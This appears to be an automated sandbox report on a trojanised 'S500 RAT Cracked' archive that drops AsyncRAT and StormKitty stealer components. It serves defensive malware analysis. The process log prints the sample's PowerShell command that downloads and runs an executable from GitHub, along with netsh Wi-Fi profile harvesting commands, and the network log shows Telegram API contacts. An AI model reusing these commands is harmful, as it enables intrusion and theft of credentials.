Malware Analysis Report

2024-10-10 10:10

Sample ID 240330-q7frbsge84
Target S500 RAT Cracked + Source .rar
SHA256 54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff
Tags
agilenet rat default upx identifier asyncrat stormkitty arrowrat agenttesla spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

54008e93bf228c29b7592f30f3f57cb6d8e419d6c9d2aa154c1a582160efbfff

Threat Level: Known bad

The file S500 RAT Cracked + Source .rar was found to be: Known bad.

Malicious Activity Summary

agilenet rat default upx identifier asyncrat stormkitty arrowrat agenttesla spyware stealer

Async RAT payload

Arrowrat family

Agenttesla family

StormKitty payload

AgentTesla payload

Stormkitty family

AsyncRat

Asyncrat family

StormKitty

Async RAT payload

Blocklisted process makes network request

Reads user/profile data of web browsers

Obfuscated with Agile.Net obfuscator

UPX packed file

Checks computer location settings

Executes dropped EXE

Loads dropped DLL

Looks up geolocation information via web service

Drops desktop.ini file(s)

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-30 13:55

Signatures

AgentTesla payload

Description Indicator Process Target
N/A N/A N/A N/A

Agenttesla family

agenttesla

Arrowrat family

arrowrat

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Asyncrat family

asyncrat

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A

Stormkitty family

stormkitty

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:46

Platform

win7-20240221-en

Max time kernel

1561s

Max time network

1573s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

Enumerates physical storage devices

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2804 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2804 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 2804 wrote to memory of 2896 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-30 13:53

Reported

2024-03-30 14:18

Platform

win10-20240221-en

Max time kernel

164s

Max time network

169s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

Signatures

AsyncRat

rat asyncrat

StormKitty

stealer stormkitty

StormKitty payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
File created C:\Users\Admin\AppData\Local\0b852a882561946dd16ae313f6c082b8\Admin@VAFMQYLS_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A icanhazip.com N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Internet Explorer\TypedURLs C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 33 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 34 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 35 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: 36 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1156 wrote to memory of 3736 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 1156 wrote to memory of 3736 N/A C:\Windows\system32\cmd.exe C:\Program Files\7-Zip\7zFM.exe
PID 4604 wrote to memory of 4784 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 4604 wrote to memory of 4784 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe C:\Windows\System32\cmd.exe
PID 4784 wrote to memory of 5084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4784 wrote to memory of 5084 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\chcp.com
PID 4784 wrote to memory of 3768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 4784 wrote to memory of 3768 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
PID 4148 wrote to memory of 3084 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 4148 wrote to memory of 3084 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 4148 wrote to memory of 3084 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 3084 wrote to memory of 700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3084 wrote to memory of 700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3084 wrote to memory of 700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 3084 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3084 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3084 wrote to memory of 920 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3084 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3084 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 3084 wrote to memory of 3936 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\findstr.exe
PID 4148 wrote to memory of 2848 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 4148 wrote to memory of 2848 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 4148 wrote to memory of 2848 N/A C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe C:\Windows\SysWOW64\cmd.exe
PID 2848 wrote to memory of 708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2848 wrote to memory of 708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2848 wrote to memory of 708 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\chcp.com
PID 2848 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2848 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2848 wrote to memory of 1528 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 4784 wrote to memory of 364 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 364 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4784 wrote to memory of 1524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe
PID 4784 wrote to memory of 1524 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\taskhostw.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Program Files\7-Zip\7zFM.exe

"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"

C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe

"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\B6D8.tmp\B6D9.tmp\B6E9.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""

C:\Windows\system32\chcp.com

chcp 65001

C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe

ServerRegistrationManager.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell -Command "Invoke-WebRequest 'https://github.com/CVE-TEAMDSNH-20230611/20230611VNM/raw/main/taskhostw.exe' -OutFile taskhostw.exe"

C:\Windows\system32\taskhostw.exe

taskhostw.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 217.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 icanhazip.com udp
US 104.16.184.241:80 icanhazip.com tcp
US 8.8.8.8:53 api.mylnikov.org udp
US 104.21.44.66:443 api.mylnikov.org tcp
US 8.8.8.8:53 241.184.16.104.in-addr.arpa udp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 66.44.21.104.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
NL 149.154.167.220:443 api.telegram.org tcp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:7707 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:7707 tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp
N/A 127.0.0.1:8808 tcp

Files

C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe

MD5 87ca06f69c513f4fbbf67c5b4e366210
SHA1 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa
SHA256 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5
SHA512 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb

memory/3608-460-0x0000000000860000-0x0000000000988000-memory.dmp

memory/3608-462-0x00007FF9B1090000-0x00007FF9B1A7C000-memory.dmp

memory/3608-463-0x000000001B6F0000-0x000000001B700000-memory.dmp

